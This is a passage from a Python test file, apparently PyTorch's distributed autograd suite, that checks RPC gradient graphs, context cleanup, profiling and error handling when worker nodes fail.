@dist_init
def test_graph_for_py_nested_call(self):
self._test_graph_for_py_nested_call(ExecMode.RPC_SYNC)
@dist_init
def test_graph_for_py_nested_remote_call(self):
self._test_graph_for_py_nested_call(ExecMode.REMOTE)
# Rank0->Rank1->Rank0
def _test_graph_for_py_nested_call_itself(self, exec_mode):
dst_rank = (self.rank + 1) % self.world_size
initialize_pg(self.init_method, self.rank, self.world_size)
with dist_autograd.context() as context_id:
t1 = torch.ones(3, 3, requires_grad=True)
t2 = torch.zeros(3, 3, requires_grad=True)
if ExecMode.RPC_SYNC == exec_mode:
ret = rpc.rpc_sync(
worker_name(dst_rank),
my_py_nested_call,
args=(
t1,
t2,
(self.rank - 1 + self.world_size) % self.world_size,
self.world_size,
0,
),
)
elif ExecMode.REMOTE == exec_mode:
ret = rpc.remote(
worker_name(dst_rank),
my_py_nested_call,
args=(
t1,
t2,
(self.rank - 1 + self.world_size) % self.world_size,
self.world_size,
0,
),
).to_here()
else:
raise ValueError("Unrecognized ExecMode {}".format(exec_mode))
rpc.rpc_sync(
worker_name((self.rank + 1) % self.world_size),
_set_rpc_done,
args=(context_id, 1),
)
# For self.rank, it has 2 graphs to verify.
# One is for current context id when this rank send first rpc
# call and execute the torch.add() operator.
# Another one is for prev context id when this rank make
# nested call.
ctx = dist_autograd._current_context()
self.assertEqual(context_id, ctx._context_id())
send_functions = ctx._send_functions()
self.assertEqual(2, len(send_functions))
recv_functions = ctx._recv_functions()
self.assertEqual(2, len(recv_functions))
self._verify_graph_for_first_rpc_call(
list(send_functions.values())[0],
list(recv_functions.values())[1],
t1,
t2,
ret,
)
self._verify_graph_for_rpc_call_exec(list(send_functions.values())[1])
# Verify two pairs of send and recv functions for nested
# call
self._check_rpc_done(1)
ctx = dist_autograd._retrieve_context(ctx_ids[1])
self._verify_graph_for_nested_rpc_call(ctx)
# this barrier is needed so one worker does not clean up their
# autograd context before another worker tries to access it.
dist.barrier()
@dist_init
def test_graph_for_py_nested_call_itself(self):
self._test_graph_for_py_nested_call_itself(ExecMode.RPC_SYNC)
@dist_init
def test_graph_for_py_nested_remote_call_itself(self):
self._test_graph_for_py_nested_call_itself(ExecMode.REMOTE)
def _test_no_graph_with_tensors_not_require_grad(self, exec_mode):
initialize_pg(self.init_method, self.rank, self.world_size)
dst_rank = (self.rank + 1) % self.world_size
with dist_autograd.context() as context_id:
t1 = torch.ones(3, 3, requires_grad=False)
t2 = torch.zeros(3, 3, requires_grad=False)
if ExecMode.RPC_SYNC == exec_mode:
ret = rpc.rpc_sync(
worker_name(dst_rank), torch.add, args=(t1, t2)
)
elif ExecMode.REMOTE == exec_mode:
ret = rpc.remote(
worker_name(dst_rank), torch.add, args=(t1, t2)
).to_here()
else:
raise ValueError("Unrecognized ExecMode {}".format(exec_mode))
rpc.rpc_sync(
worker_name(dst_rank), _set_rpc_done, args=(context_id, 1)
)
ctx = dist_autograd._current_context()
send_functions = ctx._send_functions()
self.assertEqual(len(send_functions), 0)
recv_functions = ctx._recv_functions()
self.assertEqual(len(recv_functions), 0)
# Wait for the prev rank to be done with rpc.
self._check_rpc_done(1)
# NB: RRef.to_here() always passes the autograd context to the
# the callee, as the caller does not know whether the return
# value would contain a requires_grad tensor or not.
#
# rpc/remote with udf (_set_rpc_done here) also always passes the
# autograd context to the callee due to the same reason.
self.assertNotEqual(-1, dist_autograd._retrieve_context(ctx_ids[1]))
dist.barrier()
@dist_init
def test_no_graph_with_tensors_not_require_grad(self):
self._test_no_graph_with_tensors_not_require_grad(ExecMode.RPC_SYNC)
@dist_init
def test_no_graph_with_tensors_not_require_grad_remote(self):
self._test_no_graph_with_tensors_not_require_grad(ExecMode.REMOTE)
def _test_grad_only_on_return_value(self, exec_mode):
initialize_pg(self.init_method, self.rank, self.world_size)
dst_rank = (self.rank + 1) % self.world_size
with dist_autograd.context() as context_id:
if ExecMode.RPC_SYNC == exec_mode:
ret = rpc.rpc_sync(worker_name(dst_rank), ret_requires_grad)
elif ExecMode.REMOTE == exec_mode:
ret = rpc.remote(
worker_name(dst_rank), ret_requires_grad
).to_here()
else:
raise ValueError("Unrecognized ExecMode {}".format(exec_mode))
dist_autograd.backward(context_id, [ret.sum()])
rpc.rpc_sync(
worker_name(dst_rank), _set_rpc_done, args=(context_id, 1)
)
# Wait for the prev rank to be done with rpc.
self._check_rpc_done(1)
grads = dist_autograd.get_gradients(ctx_ids[1])
self.assertEqual(1, len(grads))
self.assertIn(requires_grad_tensor, grads)
self.assertEqual(torch.ones_like(ret), grads[requires_grad_tensor])
# due to the above get_gradients call, ensure that dist autograd
# contexts aren't cleaned up until all workers exit context managers
dist.barrier()
@dist_init
def test_grad_only_on_return_value(self):
self._test_grad_only_on_return_value(ExecMode.RPC_SYNC)
@dist_init
def test_grad_only_on_return_value_remote(self):
self._test_grad_only_on_return_value(ExecMode.REMOTE)
def _test_rpc_complex_args(self, exec_mode):
with dist_autograd.context() as context_id:
num_tensors = 10
tensors = []
for i in range(num_tensors):
tensors.append(torch.ones(3, 3, requires_grad=(i % 2 == 0)))
dst_rank = self._next_rank()
if ExecMode.RPC_SYNC == exec_mode:
ret = rpc.rpc_sync(
worker_name(dst_rank), torch.stack, args=(tensors,)
)
elif ExecMode.REMOTE == exec_mode:
ret = rpc.remote(
worker_name(dst_rank), torch.stack, args=(tensors,)
).to_here()
else:
raise ValueError("Unrecognized ExecMode {}".format(exec_mode))
self.assertEqual(torch.stack(tensors), ret)
# Verify appropriate tensors have been attached the autograd graph.
next_funcs = list(
dist_autograd._current_context()._send_functions().values()
)[0].next_functions
idx = 0
for i in range(len(next_funcs)):
self.assertEqual(
"torch::autograd::AccumulateGrad", next_funcs[i][0].name()
)
self.assertEqual(tensors[i], next_funcs[i][0].variable)
# Verify that the worker id has been recorded in the context
ctx = dist_autograd._current_context()
worker_ids = ctx._known_worker_ids()
self.assertEqual(len(worker_ids), 1)
self.assertEqual(worker_ids, {dst_rank})
@dist_init
def test_rpc_complex_args(self):
self._test_rpc_complex_args(ExecMode.RPC_SYNC)
@dist_init
def test_remote_complex_args(self):
self._test_rpc_complex_args(ExecMode.REMOTE)
def context_cleanup_test_helper(self, rpc_args, func, nested=False):
initialize_pg(self.init_method, self.rank, self.world_size)
# test that in dist autograd, in the case that tensors communicated over RPC do
# NOT require grad, we still cleanup the dist autograd contexts created
# on other nodes. This is because the autograd context is still
# communicated over RPC even if tensor arguments do not require grad, as
# it is possible that the response could.
if nested:
dst_rank = (self.rank + 1) % self.world_size
nested_dst_rank = (dst_rank + 1) % self.world_size
dst_ranks = {dst_rank}
else:
dst_ranks = {rank for rank in range(self.world_size) if rank != self.rank}
with dist_autograd.context() as context_id:
for dst_rank in dst_ranks:
rpc.rpc_sync(worker_name(dst_rank), func, args=rpc_args)
rpc.rpc_sync(
worker_name(dst_rank), _set_rpc_done, args=(context_id, 1)
)
if nested:
rpc.rpc_sync(
worker_name(nested_dst_rank),
_set_rpc_done,
args=(context_id, 2),
)
# the thread's context id should be cleaned up
with self.assertRaises(RuntimeError):
dist_autograd._retrieve_context(context_id)
# Ensure all peers have finished mutating the
# `known_context_ids` set.
dist.barrier()
# check that all contexts have been cleaned up.
success = _all_contexts_cleaned_up()
self.assertTrue(success)
@dist_init
def test_context_cleanup_tensor_with_grad(self):
t1 = torch.ones(3, 3, requires_grad=True)
t2 = torch.zeros(3, 3, requires_grad=True)
self.context_cleanup_test_helper(rpc_args=(t1, t2), func=torch.add)
@dist_init
def test_context_cleanup_tensor_no_grad(self):
t1 = torch.ones(3, 3, requires_grad=False)
self.context_cleanup_test_helper(rpc_args=(t1, t1), func=torch.add)
@dist_init
def test_context_cleanup_no_tensors(self):
self.context_cleanup_test_helper(rpc_args=(1, 1), func=my_scalar_add)
@dist_init
def test_context_cleanup_nested_rpc(self):
t1 = torch.ones(3, 3, requires_grad=True)
t2 = torch.zeros(3, 3, requires_grad=True)
dst_rank = (self.rank + 1) % self.world_size
args = (t1, t2, dst_rank, self.world_size, 0)
self.context_cleanup_test_helper(
rpc_args=args, func=my_py_nested_call, nested=True
)
@dist_init
def test_worker_ids_recorded(self):
dst_ranks = {rank for rank in range(self.world_size) if rank != self.rank}
with dist_autograd.context() as context_id:
# if no tensors require grad, we should still record worker_ids, as
# the autograd context ID is still passed to other workers.
t1 = torch.ones(3, 3, requires_grad=False)
t2 = torch.zeros(3, 3, requires_grad=False)
for dst_rank in dst_ranks:
rpc.rpc_sync(worker_name(dst_rank), torch.add, args=(t1, t2))
rpc.rpc_sync(
worker_name(dst_rank), _set_rpc_done, args=(context_id, 1)
)
# all worker_ids in dst_ranks should be recorded.
ctx = dist_autograd._current_context()
worker_ids = ctx._known_worker_ids()
self.assertEqual(worker_ids, dst_ranks)
# worker_ids should be recorded when tensors do require grad
t1.requires_grad = True
t2.requires_grad = True
for dst_rank in dst_ranks:
ret = rpc.rpc_sync(
worker_name(dst_rank), torch.add, args=(t1, t2)
)
rpc.rpc_sync(
worker_name(dst_rank), _set_rpc_done, args=(context_id, 1)
)
# all worker_ids in dst_ranks should be recorded.
worker_ids = ctx._known_worker_ids()
self.assertEqual(worker_ids, dst_ranks)
@dist_init
def test_dist_autograd_profiling(self):
with dist_autograd.context() as context_id:
t1 = torch.rand(3, 3, requires_grad=True)
t2 = torch.rand(3, 3, requires_grad=True)
loss = rpc.rpc_sync(worker_name(self._next_rank()), torch.add, args=(t1, t2)).sum()
with torch.autograd.profiler.profile() as p:
dist_autograd.backward(context_id, [loss])
function_events = p.function_events
def get_event(partial_key):
return [event for event in function_events if partial_key in event.name][0]
send_event = get_event("SendRpcBackward")
recv_event = get_event("RecvRpcBackward")
backward_event = get_event("torch::distributed::autograd::backward")
# There should be at least 1 send and recv_events each, corresponding to send/recv functions executed.
self.assertEqual(send_event.count, 1)
self.assertEqual(recv_event.count, 1)
# The CPU total for backward event should be great than send and recv, since
# applying those functions in the backwards pass is a subset of the entire backward pass.
self.assertGreater(backward_event.cpu_time_total, send_event.cpu_time_total)
self.assertGreater(backward_event.cpu_time_total, recv_event.cpu_time_total)
@dist_init
def test_error_in_context(self):
with dist_autograd.context() as context_id:
t1 = torch.rand(3, 3, requires_grad=True)
t2 = torch.rand(6, 6, requires_grad=True)
with self.assertRaises(RuntimeError):
# This should throw an error since matrix sizes don't match.
rpc.rpc_sync(
worker_name(self._next_rank()), torch.matmul, args=(t1, t2)
)
def _verify_backwards(self, exec_mode, tensors, context_id, local_grads, *args):
if exec_mode == ExecMode.LOCAL:
torch.autograd.backward(tensors)
return [arg.grad for arg in args]
else:
self._verify_backwards_remote(tensors, context_id, local_grads, *args)
def _verify_backwards_remote(self, tensors, context_id, local_grads, *args):
dist_autograd.backward(context_id, tensors)
# Verify grads were accumulated appropriately.
grads = dist_autograd.get_gradients(context_id)
nargs = len(args)
ngrads = 0
for i in range(0, nargs):
if local_grads[i] is not None:
self.assertIn(args[i], grads)
self.assertEqual(local_grads[i], grads[args[i]])
ngrads += 1
else:
self.assertNotIn(args[i], grads)
self.assertEqual(ngrads, len(grads))
@dist_init
def test_backward_no_grad_on_tensor(self):
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3), requires_grad=True)
with dist_autograd.context() as context_id:
loss = rpc.rpc_sync(
worker_name(self._next_rank()),
torch.add,
args=(t1, t2)).sum()
dist_autograd.backward(context_id, [loss], retain_graph=True)
self.assertIsNone(t1.grad)
self.assertIsNone(t2.grad)
# Now populate .grad with local autograd engine and
# verify dist autograd doesn't mess with it.
loss_local = torch.add(t1, t2).sum()
loss_local.backward()
self.assertIsNotNone(t1.grad)
self.assertIsNotNone(t2.grad)
t1_grad_before = t1.grad
t2_grad_before = t2.grad
dist_autograd.backward(context_id, [loss])
self.assertEqual(t1_grad_before, t1.grad)
self.assertEqual(t2_grad_before, t2.grad)
def _test_backward_simple(self, dst):
# Run the same code locally and with dist autograd and verify gradients
# are same.
local_grads = None
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3), requires_grad=True)
for exec_mode in [ExecMode.LOCAL, ExecMode.RPC_SYNC, ExecMode.REMOTE]:
with dist_autograd.context() as context_id:
ret = self._exec_func_with_dst(
dst, exec_mode, torch.add, t1, t2
)
loss = ret.sum()
ret = self._verify_backwards(
exec_mode, [loss], context_id, local_grads, t1, t2
)
local_grads = ret if ret else local_grads
@dist_init
def test_backward_simple(self):
self._test_backward_simple(self._next_rank())
@dist_init
def test_backward_simple_self(self):
self._test_backward_simple(self.rank)
# The current rank first creates a tensor on the rref_owner, and then passes
# the rref with another tensor to the callee to run either my_rref_add or
# my_nested_rref_add, depending on whether the callee is the rref owner.
# The grad of tensor lives on the current rank, and the grad of the rref
# tensor lives on the rref owner.
def _test_backward_rref(self, callee, rref_owner):
local_grads = None
t1 = torch.ones((3, 3), requires_grad=True)
t2 = torch.zeros((3, 3), requires_grad=True)
local_ret = torch.add(t1, t2)
local_ret.sum().backward()
with dist_autograd.context() as context_id:
rref_t1 = rpc.remote(
rref_owner, _torch_ones, args=((3, 3),), kwargs={"requires_grad": True}
)
if callee == rref_owner:
rref = rpc.remote(callee, my_rref_add, args=(rref_t1, t2))
else:
rref = rpc.remote(
callee, my_nested_rref_add, args=(rref_owner, rref_t1, t2)
)
ret = rref.to_here()
dist_autograd.backward(context_id, [ret.sum()])
# verify grads on caller
grads = dist_autograd.get_gradients(context_id)
self.assertIn(t2, grads)
self.assertEqual(grads[t2], t2.grad)
# verify grads on rref owner
self.assertTrue(
rpc.rpc_sync(
rref_owner,
_compare_owner_value,
args=(context_id, rref_t1, t1.grad),
)
)
@dist_init
def test_backward_rref(self):
callee = worker_name(self._next_rank())
rref_owner = callee
self._test_backward_rref(callee, rref_owner)
@dist_init
def test_backward_rref_multi(self):
if self.rank > 0:
callee = "worker0"
rref_owner = callee
self._test_backward_rref(callee, rref_owner)
@dist_init
def test_backward_rref_nested(self):
callee = worker_name((self.rank + 1) % self.world_size)
rref_owner = worker_name((self.rank + 2) % self.world_size)
self._test_backward_rref(callee, rref_owner)
# In this test, every rank will serve as a parameter server (ps) and a
# driver, and then kicks off trainers on the other three ranks. So, we have:
# ps = rank0 with trainers = rank1/2/3
# ps = rank2 with trainers = rank2/3/0
# ps = rank3 with trainers = rank3/0/1
# ps = rank4 with trainers = rank0/1/2
#
# These four test ps-trainer groups run on completely separate autograd
# graphs, but they share the same set of underlying RpcAgents.
def _test_trainer_ps(self, create_ref_fn, trainer_fn):
local_grads = None
t1 = torch.ones((3, 3), requires_grad=True)
t2 = torch.zeros((3, 3), requires_grad=True)
local_ret = torch.add(t1, t2)
local_ret.sum().backward()
# create rref on self
rref_t1 = rpc.remote(
worker_name(self.rank),
create_ref_fn,
args=())
# kick off forward and backward pass on three other workers (trainers)
rank_diffs = [1, 2, 3]
futures = []
for rank_diff in rank_diffs:
futures.append(
rpc.rpc_async(
worker_name((self.rank + rank_diff) % self.world_size),
trainer_fn,
args=(rref_t1, t2, worker_name(self.rank), rank_diff),
)
)
# check if the trainers have done with their backward pass
for rank_diff in rank_diffs:
self._check_rpc_done(rank_diff)
# trainers are done and holding the context for verification
accumulate_grad_func = None
for rank_diff in rank_diffs:
# make sure grads are accumulated for the same tensors and values
# are all correct
ctx_id = ctx_ids[rank_diff]
grads = dist_autograd.get_gradients(ctx_id)
local_t1 = rref_t1.to_here()
self.assertIn(local_t1, grads)
self.assertEqual(grads[local_t1], t1.grad)
# unblock trainers
_set_rpc_done(None, 0)
# wait until all trainers are done
torch.futures.wait_all(futures)
@dist_init
def test_trainer_ps(self):
self._test_trainer_ps(create_tensor, _run_trainer)
@dist_init
def test_trainer_ps_torchscript_functions(self):
# TODO, need more investigation
# there is rref leak when shutting down, suspect it is because
# ref as arg is passed to pybind boundary, and the ref is not garbage
# collected by python when calling shutdown()
import torch.distributed.rpc.api as api
api._ignore_rref_leak = True
self._test_trainer_ps(create_torchscript_tensor, _run_trainer_torchscript)
@dist_init
def test_backward_multiple_round_trips(self):
local_grads = None
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3))
t3 = torch.rand((3, 3), requires_grad=True)
t4 = torch.rand((3, 3))
t5 = torch.rand((3, 3), requires_grad=True)
for exec_mode in [ExecMode.LOCAL, ExecMode.RPC_SYNC, ExecMode.REMOTE]:
with dist_autograd.context() as context_id:
# Multiple RPCs between different nodes.
val = self._exec_func(exec_mode, torch.add, t1, t2)
val = self._exec_func(exec_mode, torch.mul, t3, val)
s1 = self._exec_func(exec_mode, torch.stack, (t4, val))
s2 = self._exec_func(exec_mode, torch.stack, (t5, val))
val = self._exec_func(exec_mode, torch.bmm, s1, s2)
val = self._exec_func(exec_mode, torch.matmul, val, val)
loss = val.sum()
ret = self._verify_backwards(
exec_mode, [loss], context_id, local_grads, t1, t2, t3, t4, t5
)
local_grads = ret if ret else local_grads
@dist_init
def test_backward_different_tensor_dims(self):
local_grads = None
t1 = torch.rand((4, 6), requires_grad=True)
t2 = torch.rand((6, 5))
t3 = torch.rand((5, 7), requires_grad=True)
t4 = torch.rand((7, 9))
for exec_mode in [ExecMode.LOCAL, ExecMode.RPC_SYNC, ExecMode.REMOTE]:
with dist_autograd.context() as context_id:
val = self._exec_func(exec_mode, torch.matmul, t1, t2)
val = self._exec_func(exec_mode, torch.chain_matmul, [val, t3, t4])
loss = val.sum()
ret = self._verify_backwards(
exec_mode, [loss], context_id, local_grads, t1, t2, t2, t3, t4
)
local_grads = ret if ret else local_grads
@dist_init
def test_backward_unused_tensors(self):
local_grads = None
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3), requires_grad=True)
t3 = torch.rand((3, 3), requires_grad=True)
for exec_mode in [ExecMode.LOCAL, ExecMode.RPC_SYNC, ExecMode.REMOTE]:
with dist_autograd.context() as context_id:
s = self._exec_func(exec_mode, torch.stack, (t1, t2, t3))
val = self._exec_func(
exec_mode,
torch.matmul,
torch.narrow(s, 0, 0, 1),
torch.narrow(s, 0, 2, 1),
)
loss = val.sum()
ret = self._verify_backwards(
exec_mode, [loss], context_id, local_grads, t1, t2, t3
)
local_grads = ret if ret else local_grads
@dist_init
def test_backward_multiple_output_tensors(self):
local_grads = None
t = torch.rand((10, 2), requires_grad=True)
for exec_mode in [ExecMode.LOCAL, ExecMode.RPC_SYNC, ExecMode.REMOTE]:
with dist_autograd.context() as context_id:
tensor_list = self._exec_func(exec_mode, torch.split, t, 2)
t1 = tensor_list[0]
t2 = tensor_list[2]
t3 = tensor_list[4]
val = self._exec_func(exec_mode, torch.chain_matmul, [t1, t2, t3])
loss = val.sum()
ret = self._verify_backwards(
exec_mode, [loss], context_id, local_grads, t
)
local_grads = ret if ret else local_grads
def _run_test_backward_unused_send_function_in_thread(self):
with dist_autograd.context() as context_id:
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3), requires_grad=True)
# We don't use the result of an RPC function, as a result the
# backward pass would hang in the "FAST" mode.
res = rpc.rpc_sync(
worker_name(self._next_rank()), torch.add, args=(t1, t2)
)
val = torch.mul(t1, t2)
# Run backward, this would hang forever.
dist_autograd.backward(context_id, [val.sum()])
@dist_init
def test_backward_unused_send_function(self):
# Run the test in a thread which would never finish.
t = threading.Thread(
target=self._run_test_backward_unused_send_function_in_thread
)
t.daemon = True
t.start()
t.join(10) # Wait for 10s.
# Verify thread is still alive (indicating backward hasn't completed yet).
self.assertTrue(t.is_alive())
@dist_init
def test_backward_autograd_engine_error(self):
with dist_autograd.context() as context_id:
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3), requires_grad=True)
# Perform some ops before error simulation.
tmp = (t1 + t2) * (t1 + t2)
t3 = SimulateBackwardError.apply(tmp)
# Run multiple round trips across different nodes and verify the
# original node receives an error thrown on a node deep in the chain.
val = rpc.rpc_sync(
worker_name(self._next_rank()), torch.add, args=(t2, t3)
)
val = rpc.rpc_sync(
worker_name(self._next_rank()), torch.mul, args=(val, t2)
)
val = rpc.rpc_sync(
worker_name(self._next_rank()), torch.matmul, args=(val, t2)
)
val = rpc.rpc_sync(
worker_name(self._next_rank()), torch.div, args=(val, t2)
)
with self.assertRaisesRegex(
RuntimeError, "Error on Node [0-9]+: Simulate error on backward pass"
):
# Run backwards, and validate we receive an error.
dist_autograd.backward(context_id, [val.sum()])
@dist_init(clean_shutdown=False)
@unittest.skipIf(
IS_MACOS,
"Test is flaky on MacOS since libuv error handling is not as robust as TCP",
)
def test_backward_node_failure(self):
rpc._set_rpc_timeout(5) # 5 seconds
initialize_pg(self.init_method, self.rank, self.world_size)
with dist_autograd.context() as context_id:
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3), requires_grad=True)
res = rpc.rpc_sync(
worker_name(self._next_rank()), torch.add, args=(t1, t2)
)
# Wait for all RPCs to be done.
dist.barrier()
# Kill all odd rank nodes.
if self.rank % 2 == 0:
shutdown_error_regex = self.get_shutdown_error_regex()
# Wait for all other nodes to die.
for rank in range(self.world_size):
if rank % 2 != 0:
wait_until_node_failure(rank, shutdown_error_regex)
# Shutdown sequence is not very well defined and as a result
# we might see any error given by get_shutdown_error_regex()
with self.assertRaisesRegex(RuntimeError, shutdown_error_regex):
# Run backwards, and validate we receive an error since all
# other nodes are dead.
dist_autograd.backward(context_id, [res.sum()])
else:
# Exit all other nodes.
pass
@dist_init
def test_backward_without_context(self):
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3), requires_grad=True)
context_id = 100 # dummy context_id
with self.assertRaisesRegex(
RuntimeError,
"Could not find autograd context with id: {}".format(context_id),
):
res = rpc.rpc_sync(
worker_name(self._next_rank()), torch.add, args=(t1, t2)
)
dist_autograd.backward(context_id, [res.sum()])
@dist_init
def test_backward_without_rpc(self):
dst_rank = self.rank
with dist_autograd.context() as context_id:
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3), requires_grad=True)
t3 = torch.add(t1, t2)
dist_autograd.backward(context_id, [t3.sum()])
grads = dist_autograd.get_gradients(context_id)
self.assertEqual(2, len(grads))
self.assertIn(t1, grads)
self.assertIn(t2, grads)
self.assertEqual(torch.ones(3, 3), grads[t1])
self.assertEqual(torch.ones(3, 3), grads[t2])
@dist_init
def test_backward_invalid_args(self):
with dist_autograd.context() as context_id:
with self.assertRaisesRegex(TypeError, "incompatible function arguments"):
dist_autograd.backward(context_id, None)
with self.assertRaisesRegex(TypeError, "incompatible function arguments"):
dist_autograd.backward(None, None)
with self.assertRaisesRegex(
RuntimeError, "No tensors provided for gradient computation"
):
dist_autograd.backward(context_id, [])
with self.assertRaisesRegex(RuntimeError, "requires_grad not set on"):
t = torch.rand(3, 3)
dist_autograd.backward(context_id, [t])
with self.assertRaisesRegex(
RuntimeError, "is not a scalar, all roots need to be scalar"
):
t = torch.rand(3, 3, requires_grad=True)
dist_autograd.backward(context_id, [t])
with self.assertRaisesRegex(
RuntimeError, "does not have a valid gradient function"
):
t = torch.rand(1, requires_grad=True)
dist_autograd.backward(context_id, [t])
@dist_init
def test_backward_multiple_roots(self):
local_grads = None
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3), requires_grad=True)
for exec_mode in [ExecMode.LOCAL, ExecMode.RPC_SYNC]:
with dist_autograd.context() as context_id:
r1 = self._exec_func(exec_mode, torch.add, t1, t2).sum()
r2 = self._exec_func(exec_mode, torch.mul, t1, t2).sum()
r3 = self._exec_func(exec_mode, torch.cos, t1).sum()
r4 = self._exec_func(exec_mode, torch.div, t1, t2).sum()
local_grads = self._verify_backwards(
exec_mode, [r1, r2, r3, r4], context_id, local_grads, t1, t2
)
@dist_init
def test_backward_different_dtypes(self):
local_grads = None
t1 = torch.rand((3, 3), requires_grad=True, dtype=torch.float32)
t2 = torch.rand((3, 3), requires_grad=True, dtype=torch.float64)
for exec_mode in [ExecMode.LOCAL, ExecMode.REMOTE]:
with dist_autograd.context() as context_id:
loss = self._exec_func(exec_mode, torch.add, t1, t2).sum()
local_grads = self._verify_backwards(
exec_mode, [loss], context_id, local_grads, t1, t2
)
@dist_init
def test_backward_simple_python_udf(self):
# Run the same code locally and with dist autograd and verify gradients
# are same.
local_grads = None
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3), requires_grad=True)
for exec_mode in [ExecMode.LOCAL, ExecMode.REMOTE]:
with dist_autograd.context() as context_id:
ret = self._exec_func(exec_mode, my_py_add, t1, t2)
loss = ret.sum()
local_grads = self._verify_backwards(
exec_mode, [loss], context_id, local_grads, t1, t2
)
@dist_init
def test_backward_simple_script_call(self):
# Run the same code locally and with dist autograd and verify gradients
# are same.
local_grads = None
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3), requires_grad=True)
for exec_mode in [
ExecMode.LOCAL,
ExecMode.RPC_SYNC,
ExecMode.RPC_ASYNC,
ExecMode.REMOTE,
]:
with dist_autograd.context() as context_id:
forward_ret = self._exec_func(exec_mode, my_script_add, t1, t2)
loss = forward_ret.sum()
ret = self._verify_backwards(
exec_mode, [loss], context_id, local_grads, t1, t2
)
local_grads = ret if ret else local_grads
@staticmethod
def _complex_python_udf(t1, t2):
t3 = torch.nn.functional.linear(t1, t2)
t4 = torch.nn.functional.linear(t2, t3)
t5 = torch.nn.functional.linear(t3, t4)
return torch.chain_matmul(t1, t2, t3, t4, t5)
@dist_init
def test_backward_complex_python_udf(self):
# Run the same code locally and with dist autograd and verify gradients
# are same.
local_grads = None
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3), requires_grad=True)
for exec_mode in [ExecMode.LOCAL, ExecMode.REMOTE]:
with dist_autograd.context() as context_id:
ret = self._exec_func(
exec_mode, DistAutogradTest._complex_python_udf, t1, t2
)
loss = ret.sum()
local_grads = self._verify_backwards(
exec_mode, [loss], context_id, local_grads, t1, t2
)
@staticmethod
def _python_udf_with_backward_error(t1, t2):
t3 = t1 + t2
t4 = SimulateBackwardError.apply(t3)
return torch.chain_matmul(t1, t2, t3, t4)
@staticmethod
def _nested_rpc_call_backward_error(t1, t2, dst):
t1 = t1 * t2
t2 = t1 + t2
res = rpc.rpc_sync(
worker_name(dst),
DistAutogradTest._python_udf_with_backward_error,
args=(t1, t2),
)
return torch.chain_matmul(t1, t2, res)
@dist_init
def test_backward_python_udf_error(self):
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3), requires_grad=True)
with dist_autograd.context() as context_id:
loss = rpc.rpc_sync(
worker_name(self._next_rank()),
DistAutogradTest._nested_rpc_call_backward_error,
args=(t1, t2, self._next_rank()),
)
with self.assertRaisesRegex(
RuntimeError, "Simulate error on backward pass"
):
dist_autograd.backward(context_id, [loss.sum()])
_backward_done = False
@dist_init(clean_shutdown=False)
@unittest.skipIf(
IS_MACOS,
"Test is flaky on MacOS since libuv error handling is not as robust as TCP",
)
def test_backward_node_failure_python_udf(self):
# Set a short timeout to quickly time out failed RPCs.
rpc._set_rpc_timeout(5) # 5 seconds
initialize_pg(self.init_method, self.rank, self.world_size)
with dist_autograd.context() as context_id:
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3), requires_grad=True)
dst = self._next_rank()
res = rpc.rpc_sync(
worker_name(dst),
my_py_nested_call,
args=(t1, t2, dst, self.world_size, 1),
)
dist.barrier()
# Kill rank 2 (last hop of nested rpc) and verify rank 0 receives an error.
if self.rank == 2:
return
store = dist.distributed_c10d._get_default_store()
if self.rank == 0:
# Wait for rank 2 to die.
shutdown_error_regex = self.get_shutdown_error_regex()
wait_until_node_failure(2, shutdown_error_regex)
# Shutdown sequence is not very well defined and as a result
# we might see any error given by get_shutdown_error_regex().
with self.assertRaisesRegex(RuntimeError, shutdown_error_regex):
# Run backwards, and validate we receive an error since rank 2 is dead.
dist_autograd.backward(context_id, [res.sum()])
# Mark rank 0 is done in the store, since the RPC framework on
# some nodes might be broken at this point (listenLoop() in
# ProcessGroupAgent might've exited).
store.set('test_backward_node_failure_python_udf_rank0_done', "True")
else:
# Wait for backward to finish on rank 0.
store.wait(['test_backward_node_failure_python_udf_rank0_done'], timedelta(seconds=10))
@staticmethod
def _nested_python_udf(t1, t2, dst):
t3 = t1 * t2
t4 = t1 + t2
res = rpc.rpc_sync(worker_name(dst), my_py_add, args=(t3, t4))
return torch.chain_matmul(t1, t2, t3, t4, res)
@dist_init
def test_backwards_nested_python_udf(self):
# Run equivalent of _nested_python_udf locally.
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3), requires_grad=True)
t3 = t1 * t2
t4 = t1 + t2
res = t3 + t4
loss = torch.chain_matmul(t1, t2, t3, t4, res).sum()
torch.autograd.backward([loss])
# Now run distributed autograd.
with dist_autograd.context() as context_id:
loss = rpc.rpc_sync(
worker_name(self._next_rank()),
DistAutogradTest._nested_python_udf,
args=(t1, t2, self._next_rank()),
)
dist_autograd.backward(context_id, [loss.sum()])
grads = dist_autograd.get_gradients(context_id)
self.assertEqual(t1.grad, grads[t1])
self.assertEqual(t2.grad, grads[t2])
_test_clean_context_backward_context_id = None
class MyBackwardFunc(Function):
@staticmethod
def forward(ctx, input):
return input
@staticmethod
@once_differentiable
def backward(ctx, input):
assert DistAutogradTest._test_clean_context_backward_context_id is not None
# Release the context to simulate error (use barrier before releasing
# context to ensure all nodes execute the backward function).
dist.barrier()
dist_autograd._release_context(
DistAutogradTest._test_clean_context_backward_context_id
)
# Verify all contexts are cleaned up.
assert _all_contexts_cleaned_up()
return input
@dist_init
def test_clean_context_during_backward(self):
"""
This test simulates the situation where the 'backward' call might throw
an exception locally which would lead to the autograd context being
cleaned up if we're using the context manager. As a result, the autograd
context might be cleaned up while some threads are still using the
autograd context.
It is fine for the 'backward' call to throw an exception in this test,
